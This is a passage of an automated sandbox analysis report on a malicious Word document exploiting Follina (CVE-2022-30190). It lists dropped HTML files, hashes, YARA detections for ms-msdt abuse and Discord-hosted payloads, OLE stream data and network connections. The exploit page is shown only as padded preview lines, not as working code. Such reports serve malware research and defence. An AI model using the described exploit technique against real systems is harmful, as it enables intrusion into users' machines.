SSDEEP:	24:0WUe43dlK8PkikLnPKZ2kSAf9cJuQL34S0VMG:0WUe43dnUPyNTSj4S3G
MD5:	9D5D3D22DB816F7E84026BA1FCD97BB7
SHA1:	0A3C8D913D481AD880FD127E2E05763D2CAA29BC
SHA-256:	1BEB27F9276EB6FC726824CC1809399EA57A9CEF66BD020E797E95C061DDFF85
SHA-512:	6BB8FF659FCDDF99CBBAB16F116C99DE2D45339AB04F40D413407922657CED3C5601970129A8318FD9A6F1DE84D3B94615F9F1D64B61F02F3CFF2CCC64EC7C60
Malicious:	true
Yara Hits:	Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Florian Roth Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Joe Security Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Florian Roth Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a[1].html

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6827
Entropy (8bit):	1.4956688509182383
Encrypted:	false
SSDEEP:	24:0WUe43dlK8PkikLnPKZ2kSAf9cJuQL34S0VMG:0WUe43dnUPyNTSj4S3G
MD5:	9D5D3D22DB816F7E84026BA1FCD97BB7
SHA1:	0A3C8D913D481AD880FD127E2E05763D2CAA29BC
SHA-256:	1BEB27F9276EB6FC726824CC1809399EA57A9CEF66BD020E797E95C061DDFF85
SHA-512:	6BB8FF659FCDDF99CBBAB16F116C99DE2D45339AB04F40D413407922657CED3C5601970129A8318FD9A6F1DE84D3B94615F9F1D64B61F02F3CFF2CCC64EC7C60
Malicious:	false
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6827
Entropy (8bit):	1.4956688509182383
Encrypted:	false
SSDEEP:	24:0WUe43dlK8PkikLnPKZ2kSAf9cJuQL34S0VMG:0WUe43dnUPyNTSj4S3G
MD5:	9D5D3D22DB816F7E84026BA1FCD97BB7
SHA1:	0A3C8D913D481AD880FD127E2E05763D2CAA29BC
SHA-256:	1BEB27F9276EB6FC726824CC1809399EA57A9CEF66BD020E797E95C061DDFF85
SHA-512:	6BB8FF659FCDDF99CBBAB16F116C99DE2D45339AB04F40D413407922657CED3C5601970129A8318FD9A6F1DE84D3B94615F9F1D64B61F02F3CFF2CCC64EC7C60
Malicious:	true
Yara Hits:	Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, Author: Florian Roth Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\81D0D9EE.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	PNG image data, 724 x 1024, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	31667
Entropy (8bit):	7.606296058205636
Encrypted:	false
SSDEEP:	768:gyyyyyyyy7bb9/5B6TXBUvTF1k2K/m+p0i:gyyyyyyyy7bb9/5sLMmmMD
MD5:	6C06A8618F116BB542677F04FA34E954
SHA1:	7EB1BC6B098104C2827AADE763798AE0B0343A86
SHA-256:	618E441E2019C655AE1E777C38B96FBA72CD569CE26DE877539295B5161FFE84
SHA-512:	491B75818B466A00B9A04B64BA0065AE638F01D35FC3DF342090E3268B7508C9B6F712F4EDA9DE533036E4819B0A2D21BDA6E8B893D78E7DE84CA08FDBDC09AA
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.............N0Y.....sRGB.........pHYs...........>...{XIDATx^..Y.].y...21.Ca..,.Y..%..dK.W..e.?........-/j2%.U$X#P....$.Zm_...).....g...N..1<.{.W..^[[.z.....~.... @.............. @.@....6..E......L.>l..... @.U..G..:#@.............. ...Un.. @......{.......hU@...... @.....=@....... .h.[g... @..... @.....Z..\|..3.... @@.a.. @.......>Z........ ..... @...V.....[.Pg... @.@.......7{.... ...ur.. @...~..>...fO.....Z..\|.N.C.... .o..G...... @.@......uH......- .....=.....h]@..:.... @.@.....^..'@.......>Z'.!.........o.... @.u..G..:$@.......\|.{......... .h.\.... @.....~.... @................[@....7{.... ...ur.. @...~..>...fO.....Z..\|.N.C.... .o..G...... @.@......uH......- .....=.....h]@..:.... @.@.....^..'@.......>Z'.!.........o.... @.u..G..:$@.......\|.{......... .h.\.... @.....~.... @................[@....7{.... ...ur.. @...~..>...fO.....Z..\|.N.C.... .o..G...... @.@......uH......- .....=.....h]@..:.... @.@.....^..'@.......>Z'.!.........o.... @.u..G..:$

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6827
Entropy (8bit):	1.4956688509182383
Encrypted:	false
SSDEEP:	24:0WUe43dlK8PkikLnPKZ2kSAf9cJuQL34S0VMG:0WUe43dnUPyNTSj4S3G
MD5:	9D5D3D22DB816F7E84026BA1FCD97BB7
SHA1:	0A3C8D913D481AD880FD127E2E05763D2CAA29BC
SHA-256:	1BEB27F9276EB6FC726824CC1809399EA57A9CEF66BD020E797E95C061DDFF85
SHA-512:	6BB8FF659FCDDF99CBBAB16F116C99DE2D45339AB04F40D413407922657CED3C5601970129A8318FD9A6F1DE84D3B94615F9F1D64B61F02F3CFF2CCC64EC7C60
Malicious:	true
Yara Hits:	Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, Author: Florian Roth Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<head>..<title>..Exploit..</title>..</head>..<body>....<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

C:\Users\user\AppData\Local\Temp\{D27243F2-B974-4680-97D9-017679567B8A}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02564177450496716
Encrypted:	false
SSDEEP:	6:I3DPc3JXZxFvxggLRffPp/RbrxpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPEpbzf5tFHvYg3J/
MD5:	34ED425A319F10AF32C8DF7CAB8FFAE1
SHA1:	E2E609947E3744DF6D55FCE68FC05A2AA61C976D
SHA-256:	04BF4CD67A10ECC41EC60B64E78F97F81453F4513151CA6263267B3B10179942
SHA-512:	09AA833CAE66DF5ED02924632C363DC1631A1ABE7A6AA4B735B61FA80813588F8358EDC8757DF0A7946A5F95ACC7A049938D3C2D6E813FF7BE3269AD6D5AA4C8
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z......K....\q..S,...X.F...Fa.q............................._.n*.F.{.n..x.........?.#..hmI.vR~.9Z......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{E560C265-B8FC-4A02-872E-FF7D04240D0D}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025522874805431084
Encrypted:	false
SSDEEP:	6:I3DPcu2MzTVvxggLRQUlVyg2XtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPpbTZsoYVvYg3J/
MD5:	82376414F37A7716D2B1ECEDE9D273D2
SHA1:	98EE3B38525F05BA0DF69F87B146543B1ED703A1
SHA-256:	8437DBC0FDD171BC1111EF831F2A7D71D40F2B40790431C5A6708A3D08B13D1B
SHA-512:	981A7E9DD78414B5524457606B35107DA59F96C6627B3621AED029913792E3ACFF2285E0C9B4CB6D4E67C5935A053376BC2440E7CB6A41CAD6C7D17C1DC1557A
Malicious:	false
Preview:	......M.eFy...z)....n@.:GJn...S,...X.F...Fa.q............................w..?.WCE.X..............d.qR..@.Z..w.S......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	71
Entropy (8bit):	4.7517417537838185
Encrypted:	false
SSDEEP:	3:bDuMJlLTwjomX1dhwjov:bCATwjnwjy
MD5:	25D7B5D6D6086847396CCCDADCA6C87C
SHA1:	162AB026FAB5A2DC042B0E28A7C95E8586F4150B
SHA-256:	0A585BE0F2682A21AC65E72D7E2243996FF2D339CBF7381F73A141886FD893AC
SHA-512:	0346058E240E405B86D3AC8BB5FC6A5B4FB33BC4E6D2FDB72E451C036724BD0A3F0C76658B002E46E99784EC7E8B9C65117B14C3989979A71904113173C42DA6
Malicious:	false
Preview:	[folders]..Templates.LNK=0..v4nkfHg4d9.LNK=0..[doc]..v4nkfHg4d9.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\v4nkfHg4d9.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:56 2022, mtime=Tue Mar 8 15:45:56 2022, atime=Tue Sep 20 18:01:17 2022, length=77319, window=hide
Category:	dropped
Size (bytes):	1014
Entropy (8bit):	4.571524158318932
Encrypted:	false
SSDEEP:	12:8SuB/1zFgXg/XAlCPCHaXNBQtB/SxXX+W3fcfY5i6vDuicvb8odvD+DtZ3YilMMw:8SuD//XT9SUEZCJehiDv3qEu7D
MD5:	4BD4BE241A945CBA7C698EF148E07406
SHA1:	F1FE545BCE5F19932BF5A61FAB2739415EAB951C
SHA-256:	C8B54A2C821B444583AB000AACE311D61D46E6C531B489E154E5079251356E54
SHA-512:	ECC3852A0F4FCC2231D9AD8E68FCDD5AF1D157F68A815666B671056DBC7C8FA5BA15F31345E5E78F867DE4E089D86031224E8BDEB0FA31741427C1FB4E7C09FD
Malicious:	false
Preview:	L..................F.... ....-[..3...-[..3.....\#................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....4U). .V4NKFH~1.DOC..J......hT..hT.....r.....'...............v.4.n.k.f.H.g.4.d.9...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\093954\Users.user\Desktop\v4nkfHg4d9.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.v.4.n.k.f.H.g.4.d.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......093954..........D_....3N...W...9G..N..... .....[D_....3N...W...9G..N..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

C:\Users\user\Desktop\~$nkfHg4d9.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:	D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:	23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:	116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:	7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	7.78474754382263
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	v4nkfHg4d9.doc
File size:	77319
MD5:	cbc307d6059925e9abbdbdec4d9ec0c1
SHA1:	8f0fc563f43cc1422b523a21f01858e031761e5f
SHA256:	8d61ea9ef38b6e7b36f466299223ad43339080d3a9914059c88ca3dd6be5cd32
SHA512:	58d4ef2537a7afaa1f37787f2c40e3084c19ccd350216c691ce9296b18d2864c2286176413ada7d53a350a9a98e2eab6b660a2af74b921d271e0fe3c1c60201f
SSDEEP:	1536:86yyyyyyyy7bb9/5sLMmmMBIBEgMFBuvfve6046kHOUZgfCG5934Si:Vbh585IBm5IhZtGyR
TLSH:	8E73D01ED251C677F2270A34AA962C4FA1680EB29814DE6579EB709F9393F700FB1DC1
File Content Preview:	PK..........!.R(G]t...........[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "/opt/package/joesandbox/database/analysis/706117/sample/v4nkfHg4d9.doc"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Summary

Title:
Subject:
Author:
Keywords:
Template:
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2022-09-14T21:33:00Z
Last Saved Time:	2022-09-14T21:35:00Z
Number of Pages:	1
Number of Words:	3
Number of Characters:	24
Creating Application:
Security:	0

Document Summary

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 77

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	77
Entropy:	2.954779533874008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	\x1Ole
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole10Native, File Type: data, Stream Size: 2224196

General
Stream Path:	\x1Ole10Native
File Type:	data
Stream Size:	2224196
Entropy:	2.717138672565793
Base64 Encoded:	False
Data ASCII:	@ ! . B M 6 ! . . . . . 6 . . . ( . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	40 f0 21 00 42 4d 36 f0 21 00 00 00 00 00 36 00 00 00 28 00 00 00 d4 02 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 f0 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6

General
Stream Path:	\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 04 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 20, 2022 12:02:10.696459055 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.742836952 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:10.742918968 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.791011095 CEST	21	49179	185.27.134.11	192.168.2.22
Sep 20, 2022 12:02:10.791162968 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.792032003 CEST	49179	21	192.168.2.22	185.27.134.11
Sep 20, 2022 12:02:10.837688923 CEST	21	49179	185.27.134.11	192.168.2.22
